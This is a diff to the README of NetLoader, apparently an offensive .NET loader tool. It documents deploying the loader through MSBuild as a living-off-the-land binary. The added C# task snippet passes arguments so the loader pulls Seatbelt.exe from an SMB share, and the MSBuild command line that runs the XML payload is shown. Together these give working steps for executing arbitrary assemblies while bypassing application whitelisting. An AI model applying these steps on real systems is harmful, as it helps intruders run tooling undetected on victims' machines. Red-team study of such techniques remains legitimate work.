Flangvik/NetLoader/README.md

 # Deploy via LOLBin (MSBuild)

 Payload for MSBuild is in the /LOLBins folder, might push this for varius other LOLBins aswell.
-NetLoader has to be used in interactive mode when deployed using MSBuild
+Arguments have to be added into the bottom XML file when NetLoader is deployed using MSBuild

+	Adding arguments to the XML payload
+	    public class ClassExample : Task, ITask
+	    {
+	        public override bool Execute()
+	        {	//Add your arguments here
+	            SoullikePrincelier.Main(new string[] { "--path", "\\smbshare\Seatbelt.exe" });
+	            return true;
+	        }
+	    }

 	For 64 bit:
 	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe NetLoader.xml